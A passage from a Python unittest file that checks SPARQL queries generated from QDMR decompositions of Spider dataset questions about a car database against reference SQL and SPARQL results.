result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev132(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_compare_to_sparql(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 132
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: What is the largest amount of horsepower for the models with 3 cylinders and what make is it ?
# sql_query:
# SELECT T2.horsepower , T1.Make
# FROM CAR_NAMES AS T1 JOIN CARS_DATA AS T2 ON T1.MakeId = T2.Id
# WHERE T2.cylinders = 3
# ORDER BY T2.horsepower DESC LIMIT 1;
correct_sparql_query = textwrap.dedent("""\
SELECT ?max_2 ?Make
WHERE
{
{
SELECT ?car_names_1
WHERE
{
{
SELECT ?car_names_1
WHERE
{
?cars_data_2 arc:cars_data:Id:car_names:MakeId ?car_names_1.
?cars_data_2 arc:cars_data:Cylinders ?Cylinders_1.
FILTER(?Cylinders_1 = 3).
}
GROUP BY ?car_names_1
}
?cars_data_3 arc:cars_data:Id:car_names:MakeId ?car_names_1.
?cars_data_3 arc:cars_data:Horsepower ?Horsepower_1.
{
SELECT (max(?Horsepower_2) AS ?max_1)
WHERE
{
{
SELECT ?car_names_2
WHERE
{
?cars_data_4 arc:cars_data:Id:car_names:MakeId ?car_names_2.
?cars_data_4 arc:cars_data:Cylinders ?Cylinders_2.
FILTER(?Cylinders_2 = 3).
}
GROUP BY ?car_names_2
}
?cars_data_5 arc:cars_data:Id:car_names:MakeId ?car_names_2.
?cars_data_5 arc:cars_data:Horsepower ?Horsepower_2.
}
}
FILTER(?Horsepower_1 = ?max_1).
}
GROUP BY ?car_names_1
}
?car_names_1 arc:car_names:Make ?Make.
{
SELECT (max(?Horsepower_3) AS ?max_2)
WHERE
{
{
SELECT ?car_names_3
WHERE
{
?cars_data_6 arc:cars_data:Id:car_names:MakeId ?car_names_3.
?cars_data_6 arc:cars_data:Cylinders ?Cylinders_3.
FILTER(?Cylinders_3 = 3).
}
GROUP BY ?car_names_3
}
?cars_data_7 arc:cars_data:Id:car_names:MakeId ?car_names_3.
?cars_data_7 arc:cars_data:Horsepower ?Horsepower_3.
}
}
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.add_aggregator(OutputColumnId.from_grounding(GroundingKey.make_column_grounding("cars_data", "Horsepower")), "max"),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("car_names", "Make"))])
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# 1: SELECT['models']
# 2: FILTER['#1', 'with 3 cylinders']
# 3: PROJECT['horsepowers of #REF', '#2']
# 4: AGGREGATE['max', '#3']
# 5: COMPARATIVE['#2', '#3', 'is #4']
# 6: PROJECT['the make of #REF', '#5']
# 7: UNION['#4', '#6']
grounding = {}
grounding[GroundingIndex(0,0,"models")] = GroundingKey.make_table_grounding("car_names")
# WRONG grounding:
# grounding[GroundingIndex(0,0,"models")] = GroundingKey.make_column_grounding("car_names", "Model")
grounding[GroundingIndex(1,1,"with 3 cylinders")] = GroundingKey.make_comparative_grounding("=", "3", GroundingKey.make_column_grounding("cars_data", "Cylinders"))
grounding[GroundingIndex(2,0,"horsepowers of #REF")] = GroundingKey.make_column_grounding("cars_data", "Horsepower") # GroundingKey.make_column_grounding("cars_data", "Weight")
grounding[GroundingIndex(4,2,"is #4")] = GroundingKey.make_comparative_grounding("=", "#4")
grounding[GroundingIndex(5,0,"the make of #REF")] = GroundingKey.make_column_grounding("car_names", "Make")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_comparare_to_sql(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 132
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: What is the largest amount of horsepower for the models with 3 cylinders and what make is it ?
# sql_query:
# SELECT T2.horsepower , T1.Make
# FROM CAR_NAMES AS T1 JOIN CARS_DATA AS T2 ON T1.MakeId = T2.Id
# WHERE T2.cylinders = 3
# ORDER BY T2.horsepower DESC LIMIT 1;
# Substituting this query with "ORDER BY T2.horsepower DESC LIMIT 1" to argmax constructions
sql_query = textwrap.dedent("""\
SELECT T2.horsepower , T1.Make
FROM CAR_NAMES AS T1 JOIN CARS_DATA AS T2 ON T1.MakeId = T2.Id
WHERE T2.cylinders = 3
AND
T2.horsepower = (
SELECT max(T2.horsepower)
FROM CAR_NAMES AS T1 JOIN CARS_DATA AS T2 ON T1.MakeId = T2.Id
WHERE T2.cylinders = 3
)
""")
correct_sparql_query = textwrap.dedent("""\
SELECT ?max_2 ?Make
WHERE
{
{
SELECT ?car_names_1
WHERE
{
{
SELECT ?car_names_1
WHERE
{
?cars_data_2 arc:cars_data:Id:car_names:MakeId ?car_names_1.
?cars_data_2 arc:cars_data:Cylinders ?Cylinders_1.
FILTER(?Cylinders_1 = 3).
}
GROUP BY ?car_names_1
}
?cars_data_3 arc:cars_data:Id:car_names:MakeId ?car_names_1.
?cars_data_3 arc:cars_data:Horsepower ?Horsepower_1.
{
SELECT (max(?Horsepower_2) AS ?max_1)
WHERE
{
{
SELECT ?car_names_2
WHERE
{
?cars_data_4 arc:cars_data:Id:car_names:MakeId ?car_names_2.
?cars_data_4 arc:cars_data:Cylinders ?Cylinders_2.
FILTER(?Cylinders_2 = 3).
}
GROUP BY ?car_names_2
}
?cars_data_5 arc:cars_data:Id:car_names:MakeId ?car_names_2.
?cars_data_5 arc:cars_data:Horsepower ?Horsepower_2.
}
}
FILTER(?Horsepower_1 = ?max_1).
}
GROUP BY ?car_names_1
}
?car_names_1 arc:car_names:Make ?Make.
{
SELECT (max(?Horsepower_3) AS ?max_2)
WHERE
{
{
SELECT ?car_names_3
WHERE
{
?cars_data_6 arc:cars_data:Id:car_names:MakeId ?car_names_3.
?cars_data_6 arc:cars_data:Cylinders ?Cylinders_3.
FILTER(?Cylinders_3 = 3).
}
GROUP BY ?car_names_3
}
?cars_data_7 arc:cars_data:Id:car_names:MakeId ?car_names_3.
?cars_data_7 arc:cars_data:Horsepower ?Horsepower_3.
}
}
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.add_aggregator(OutputColumnId.from_grounding(GroundingKey.make_column_grounding("cars_data", "Horsepower")), "max"),
OutputColumnId.from_grounding(GroundingKey.make_column_grounding("car_names", "Make"))])
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# 1: SELECT['models']
# 2: FILTER['#1', 'with 3 cylinders']
# 3: PROJECT['horsepowers of #REF', '#2']
# 4: AGGREGATE['max', '#3']
# 5: COMPARATIVE['#2', '#3', 'is #4']
# 6: PROJECT['the make of #REF', '#5']
# 7: UNION['#4', '#6']
grounding = {}
grounding[GroundingIndex(0,0,"models")] = GroundingKey.make_table_grounding("car_names")
# WRONG grounding:
# grounding[GroundingIndex(0,0,"models")] = GroundingKey.make_column_grounding("car_names", "Model")
grounding[GroundingIndex(1,1,"with 3 cylinders")] = GroundingKey.make_comparative_grounding("=", "3", GroundingKey.make_column_grounding("cars_data", "Cylinders"))
grounding[GroundingIndex(2,0,"horsepowers of #REF")] = GroundingKey.make_column_grounding("cars_data", "Horsepower") # GroundingKey.make_column_grounding("cars_data", "Weight")
grounding[GroundingIndex(4,2,"is #4")] = GroundingKey.make_comparative_grounding("=", "#4")
grounding[GroundingIndex(5,0,"the make of #REF")] = GroundingKey.make_column_grounding("car_names", "Make")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
# class TestSpiderDev135(unittest.TestCase):
# @timeout(ONE_TEST_TIMEOUT)
# def test_spider_dev(self):
# """Test an entry from spider dataset
# """
# split_name = "dev"
# i_query = 135
# db_id = get_db_id(split_name, i_query)
# rdf_graph, schema = get_graph_and_schema(split_name, db_id)
# sql_query = get_sql_query(split_name, i_query)
# # question: What is the average horsepower of the cars before 1980?
# # sql_query: SELECT avg(horsepower) FROM CARS_DATA WHERE YEAR < 1980;
# # CAUTION! the column to be averaged has "null" in it - SQL substitutes 0 instead of "null"
# # Is it even a proper NULL or just text?
# # According to https://www.sqlservercentral.com/articles/gotcha-sql-aggregate-functions-and-null
# # SQL is supposed to ignore NULL, but smth else happens
# # correct_sparql_query = textwrap.dedent("""\
# # SELECT (avg(?Horsepower) AS ?avg)
# # WHERE
# # {
# # ?cars_data arc:cars_data:Id ?cars_data.
# # ?cars_data arc:cars_data:Year ?Year.
# # FILTER(?Year < 1980.0).
# # ?cars_data arc:cars_data:Horsepower ?Horsepower.
# # }""")
# qdmr = get_qdmr_from_break(split_name, i_query)
# # break_program:
# # SELECT['cars']
# # FILTER['#1', 'before 1980']
# # PROJECT['horsepower of #REF', '#2']
# # AGGREGATE['avg', '#3'
# grounding = {}
# grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("cars_data")
# grounding[GroundingIndex(1,1,"before 1980")] = GroundingKey.make_comparative_grounding("<", "1980", GroundingKey.make_column_grounding("cars_data", "Year"))
# grounding[GroundingIndex(2,0,"horsepower of #REF")] = GroundingKey.make_column_grounding("cars_data", "Horsepower")
# sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
# result_correct = QueryResult.execute_query_sql(sql_query, schema)
# result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
# equal, message = result.is_equal_to(result_correct,
# require_column_order=True,
# require_row_order=False,
# return_message=True)
# self.assertTrue(equal, message)
class TestSpiderDev138(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 138
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: What is the average edispl for all volvos?
# sql_query: SELECT avg(T2.edispl) FROM CAR_NAMES AS T1 JOIN CARS_DATA AS T2 ON T1.MakeId = T2.Id WHERE T1.Model = 'volvo';
correct_sparql_query = textwrap.dedent("""\
SELECT (avg(?Edispl) AS ?avg)
WHERE
{
?car_names arc:car_names:Model ?Model.
FILTER(?Model = key:car_names:Model:volvo).
?cars_data arc:cars_data:Id:car_names:MakeId ?car_names.
?cars_data arc:cars_data:Edispl ?Edispl.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['volvos']
# PROJECT['edispl of #REF', '#1']
# AGGREGATE['avg', '#2']
grounding = {}
grounding[GroundingIndex(0,0,"volvos")] = GroundingKey.make_value_grounding("car_names", "Model", "volvo")
grounding[GroundingIndex(1,0,"edispl of #REF")] = GroundingKey.make_column_grounding("cars_data", "Edispl")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev141(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 141
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Which model has the most version(make) of cars?
# sql_query:
# SELECT Model
# FROM CAR_NAMES
# GROUP BY Model
# ORDER BY count(*) DESC LIMIT 1;
correct_sparql_query_long = textwrap.dedent("""\
SELECT ?Model_2
WHERE
{
{
SELECT (max(?count) AS ?max)
WHERE
{
{
SELECT ?Model_1 (count(?Make) AS ?count)
WHERE
{
?model_list arc:model_list:Model ?Model_1.
?Model arc:car_names:Model:model_list:Model ?Model_1.
?car_names arc:car_names:Model ?Model.
?car_names arc:car_names:Make ?Make.
}
GROUP BY ?Model_1
}
}
}
?model_list_1 arc:model_list:Model ?Model_2.
{
SELECT ?Model_2 (count(?Make_1) AS ?count_1)
WHERE
{
?model_list_2 arc:model_list:Model ?Model_2.
?Model_3 arc:car_names:Model:model_list:Model ?Model_2.
?car_names_1 arc:car_names:Model ?Model_3.
?car_names_1 arc:car_names:Make ?Make_1.
}
GROUP BY ?Model_2
}
FILTER(?count_1 = ?max).
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['cars']
# SELECT['models']
# PROJECT['version of #REF', '#1']
# GROUP['count', '#3', '#2']
# SUPERLATIVE['max', '#2', '#4']
grounding = {}
grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("model_list")
# Have corresponding columns related as foreign key: substitution to simplify
# grounding[GroundingIndex(1,0,"models")] = GroundingKey.make_column_grounding("model_list", "Model")
grounding[GroundingIndex(1,0,"models")] = GroundingKey.make_column_grounding("car_names", "Model")
grounding[GroundingIndex(2,0,"version of #REF")] = GroundingKey.make_column_grounding("car_names", "Make")
grounding[GroundingIndex(4,0,"max")] = GroundingKey.make_comparative_grounding("max", None)
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev_foreign_key_output_match(self):
"""Test an entry from spider dataset: columns is the output should be matched as foreign keys
"""
split_name = "dev"
i_query = 141
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Which model has the most version(make) of cars?
# sql_query:
# SELECT Model
# FROM CAR_NAMES
# GROUP BY Model
# ORDER BY count(*) DESC LIMIT 1;
correct_sparql_query_long = textwrap.dedent("""\
SELECT ?Model_2
WHERE
{
{
SELECT (max(?count) AS ?max)
WHERE
{
{
SELECT ?Model_1 (count(?Make) AS ?count)
WHERE
{
?model_list arc:model_list:Model ?Model_1.
?Model arc:car_names:Model:model_list:Model ?Model_1.
?car_names arc:car_names:Model ?Model.
?car_names arc:car_names:Make ?Make.
}
GROUP BY ?Model_1
}
}
}
?model_list_1 arc:model_list:Model ?Model_2.
{
SELECT ?Model_2 (count(?Make_1) AS ?count_1)
WHERE
{
?model_list_2 arc:model_list:Model ?Model_2.
?Model_3 arc:car_names:Model:model_list:Model ?Model_2.
?car_names_1 arc:car_names:Model ?Model_3.
?car_names_1 arc:car_names:Make ?Make_1.
}
GROUP BY ?Model_2
}
FILTER(?count_1 = ?max).
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['cars']
# SELECT['models']
# PROJECT['version of #REF', '#1']
# GROUP['count', '#3', '#2']
# SUPERLATIVE['max', '#2', '#4']
grounding = {}
grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("model_list")
# Have corresponding columns related as foreign key - need to process this in a special way
grounding[GroundingIndex(1,0,"models")] = GroundingKey.make_column_grounding("model_list", "Model")
grounding[GroundingIndex(2,0,"version of #REF")] = GroundingKey.make_column_grounding("car_names", "Make")
grounding[GroundingIndex(4,0,"max")] = GroundingKey.make_comparative_grounding("max", None)
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev144(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 144
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: What is the number of cars with more than 4 cylinders?
# sql_query: SELECT count(*) FROM CARS_DATA WHERE Cylinders > 4
correct_sparql_query = textwrap.dedent("""\
SELECT (count(?cars) AS ?count)
WHERE
{
?cars arc:cars_data:Cylinders ?Cylinders.
FILTER(?Cylinders > 4).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.add_aggregator(OutputColumnId.from_grounding(GroundingKey.make_table_grounding("cars_data"), schema), "count")])
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['cars']
# PROJECT['cylinders of #REF', '#1']
# GROUP['count', '#2', '#1']
# COMPARATIVE['#1', '#3', 'is higher than 4']
# AGGREGATE['count', '#4']
#
# Note: this QDMR does not correspond well to the scheme - column Cylinders actually has the number of cyllinders
# we are going to fix this using the grounding of the group op
grounding = {}
grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("cars_data")
grounding[GroundingIndex(1,0,"cylinders of #REF")] = GroundingKey.make_column_grounding("cars_data", "Cylinders")
grounding[GroundingIndex(2,0,"count")] = GroundingKey.make_column_grounding("cars_data", "Cylinders")
grounding[GroundingIndex(3,2,"is higher than 4")] = GroundingKey.make_comparative_grounding(">", "4")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev151(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 151
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: Which model has the most version(make) of cars?
# sql_query:
# SELECT DISTINCT T2.Model
# FROM CAR_NAMES AS T1 JOIN MODEL_LIST AS T2 ON T1.Model = T2.Model JOIN CAR_MAKERS AS T3 ON T2.Maker = T3.Id JOIN CARS_DATA AS T4 ON T1.MakeId = T4.Id
# WHERE T3.FullName = 'General Motors' OR T4.weight > 3500;
# question: Which distinctive models are produced by maker with the full name General Motors or weighing more than 3500?
# CAUTION: SQL is wrong on the current database!
correct_sparql_query = textwrap.dedent("""\
SELECT DISTINCT ?Model_2
WHERE
{
{
SELECT ?Model_2
WHERE
{
?model_list_1 arc:model_list:Model ?Model_2.
?model_list_1 arc:model_list:Maker ?Maker_1.
?Maker_1 arc:model_list:Maker:car_makers:Id ?car_makers_1.
?car_makers_1 arc:car_makers:FullName ?FullName_1.
FILTER(?FullName_1 = "General Motors").
}
GROUP BY ?Model_2
}
UNION
{
SELECT ?Model_2
WHERE
{
?Model_4 arc:car_names:Model:model_list:Model ?Model_2.
?car_names_1 arc:car_names:Model ?Model_4.
?cars_data_1 arc:cars_data:Id:car_names:MakeId ?car_names_1.
?cars_data_1 arc:cars_data:Weight ?Weight_1.
FILTER(?Weight_1 > 3500).
}
GROUP BY ?Model_2
}
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.from_grounding(GroundingKey.make_column_grounding("model_list", "Model"))])
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['distinctive models']
# FILTER['#1', 'which are produced by maker with the full name General Motors']
# FILTER['#1', 'weighing more than 3500']
# UNION['#2', '#3']
grounding = {}
grounding[GroundingIndex(0,0,"distinctive models")] = GroundingKey.make_column_grounding("model_list", "Model")
grounding[GroundingIndex(1,1,"which are produced by maker with the full name General Motors")] = GroundingKey.make_value_grounding("car_makers", "FullName", "General Motors")
grounding[GroundingIndex(2,1,"weighing more than 3500")] = GroundingKey.make_comparative_grounding(">", "3500", GroundingKey.make_column_grounding("cars_data", "Weight"))
grounding["distinct"] = ["#1"]
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev157(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 157
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: For model volvo, how many cylinders does the car with the least accelerate have?
# sql_query:
# SELECT T1.cylinders FROM CARS_DATA AS T1 JOIN CAR_NAMES AS T2 ON T1.Id = T2.MakeId WHERE T2.Model = 'volvo' ORDER BY T1.accelerate ASC LIMIT 1;
correct_sparql_query = textwrap.dedent("""\
SELECT ?Cylinders
WHERE
{
{
SELECT ?cars_data_1
WHERE
{
{
SELECT (min(?Accelerate) AS ?min)
WHERE
{
{
SELECT ?cars_data
WHERE
{
?cars_data arc:cars_data:Id:car_names:MakeId ?car_names.
?car_names arc:car_names:Model ?Model.
FILTER(?Model = key:car_names:Model:volvo).
}
GROUP BY ?cars_data
}
?cars_data arc:cars_data:Accelerate ?Accelerate.
}
}
{
SELECT ?cars_data_1
WHERE
{
?cars_data_1 arc:cars_data:Id:car_names:MakeId ?car_names_1.
?car_names_1 arc:car_names:Model ?Model_1.
FILTER(?Model_1 = key:car_names:Model:volvo).
}
GROUP BY ?cars_data_1
}
?cars_data_1 arc:cars_data:Accelerate ?Accelerate_1.
FILTER(?Accelerate_1 = ?min).
}
GROUP BY ?cars_data_1
}
?cars_data_1 arc:cars_data:Cylinders ?Cylinders.
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# #1: SELECT['cars']
# #2: PROJECT['models of #REF', '#1']
# #3: COMPARATIVE['#1', '#2', 'is volvo']
# #4: PROJECT['accelerate of #REF', '#3']
# #5: SUPERLATIVE['min', '#3', '#4']
# #6: PROJECT['cylinders of #REF', '#5']
# #7: AGGREGATE['count', '#6']
grounding = {}
grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("cars_data")
grounding[GroundingIndex(1,0,'models of #REF')] = GroundingKey.make_column_grounding("car_names", "Model")
grounding[GroundingIndex(2,2,"is volvo")] = GroundingKey.make_comparative_grounding("=", "volvo", GroundingKey.make_column_grounding("car_names", "Model"))
grounding[GroundingIndex(3,0,'accelerate of #REF')] = GroundingKey.make_column_grounding("cars_data", "Accelerate")
grounding[GroundingIndex(4,0,"min")] = GroundingKey.make_comparative_grounding("min", "None")
grounding[GroundingIndex(5,0,"'cylinders of #REF'")] = GroundingKey.make_column_grounding("cars_data", "Cylinders")
grounding[GroundingIndex(6,0,"count")] = GroundingKey.make_column_grounding("cars_data", "Cylinders")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev159(unittest.TestCase):
# @timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 159
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
# question: How many cars have a larger accelerate than the car with the largest horsepower?
# sql_query:
# SELECT COUNT(*) FROM CARS_DATA WHERE Accelerate > ( SELECT Accelerate FROM CARS_DATA ORDER BY Horsepower DESC LIMIT 1 );
# the query produces incorrect results because the column Horsepower is of type TEXT and has null written there
# to test the feature I'm swapping Horsepower to weight
correct_sparql_query = textwrap.dedent("""\
SELECT (count(?cars_data_2) AS ?count)
WHERE
{
{
SELECT (max(?Weight) AS ?max)
WHERE
{
?cars_data_1 arc:cars_data:Weight ?Weight.
}
}
?cars_data arc:cars_data:Weight ?Weight_1.
FILTER(?Weight_1 = ?max).
?cars_data arc:cars_data:Accelerate ?Accelerate.
?cars_data_2 arc:cars_data:Accelerate ?Accelerate_1.
FILTER(?Accelerate_1 > ?Accelerate).
}""")
correct_sparql_query = QueryToRdf(query=correct_sparql_query,
output_cols=[OutputColumnId.add_aggregator(OutputColumnId.from_grounding(GroundingKey.make_table_grounding("cars_data"), schema), "count")])
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['cars']
# PROJECT['horsepower of #REF', '#1']
# SUPERLATIVE['max', '#1', '#2']
# PROJECT['accelerate of #REF', '#1']
# PROJECT['accelerate of #REF', '#3']
# COMPARATIVE['#1', '#4', 'is higher than #5']
# AGGREGATE['count', '#6']
grounding = {}
grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("cars_data")
grounding[GroundingIndex(1,0,"horsepower of #REF")] = GroundingKey.make_column_grounding("cars_data", "Weight")
grounding[GroundingIndex(2,0,"max")] = GroundingKey.make_comparative_grounding("max", None)
grounding[GroundingIndex(3,0,"accelerate of #REF")] = GroundingKey.make_column_grounding("cars_data", "Accelerate")
grounding[GroundingIndex(4,0,"accelerate of #REF")] = GroundingKey.make_column_grounding("cars_data", "Accelerate")
grounding[GroundingIndex(5,2,"is higher than #5")] = GroundingKey.make_comparative_grounding(">", "#5")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_to_rdf(correct_sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev170(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 170
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
correct_sparql_query = textwrap.dedent("""\
SELECT ?country_name
WHERE
{
?countries arc:countries:CountryName ?country_name.
MINUS{
?car_makers arc:car_makers:Country ?car_maker_country.
?car_maker_country arc:car_makers:Country:countries:CountryId ?countries.
}
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
# SELECT['cars']
# FILTER['#1', 'that had 8 cylinders']
# FILTER['#1', 'that were produced before 1980']
# UNION['#2', '#3']
# PROJECT['mpg of #REF', '#4']
# AGGREGATE['max', '#5']
grounding = {}
grounding[GroundingIndex(0,0,"cars")] = GroundingKey.make_table_grounding("cars_data")
grounding[GroundingIndex(1,1,"that had 8 cylinders")] = GroundingKey.make_comparative_grounding("=", "8", GroundingKey.make_column_grounding("cars_data", "Cylinders"))
grounding[GroundingIndex(2,1,"that were produced before 1980")] = GroundingKey.make_comparative_grounding("<", "1980", GroundingKey.make_column_grounding("cars_data", "Year"))
grounding[GroundingIndex(4,0,"mpg of #REF")] = GroundingKey.make_column_grounding("cars_data", "MPG")
sparql_query = create_sparql_query_from_qdmr(qdmr, schema, rdf_graph, grounding)
result_correct = QueryResult.execute_query_sql(sql_query, schema)
result = QueryResult.execute_query_to_rdf(sparql_query, rdf_graph, schema, virtuoso_server=VIRTUOSO_SPARQL_SERVICE)
equal, message = result.is_equal_to(result_correct,
require_column_order=True,
require_row_order=False,
return_message=True)
self.assertTrue(equal, message)
class TestSpiderDev173(unittest.TestCase):
@timeout(ONE_TEST_TIMEOUT)
def test_spider_dev(self):
"""Test an entry from spider dataset
"""
split_name = "dev"
i_query = 173
db_id = get_db_id(split_name, i_query)
rdf_graph, schema = get_graph_and_schema(split_name, db_id)
sql_query = get_sql_query(split_name, i_query)
correct_sparql_query = textwrap.dedent("""\
SELECT ?country_name
WHERE
{
?countries arc:countries:CountryName ?country_name.
MINUS{
?car_makers arc:car_makers:Country ?car_maker_country.
?car_maker_country arc:car_makers:Country:countries:CountryId ?countries.
}
}""")
qdmr = get_qdmr_from_break(split_name, i_query)
# break_program:
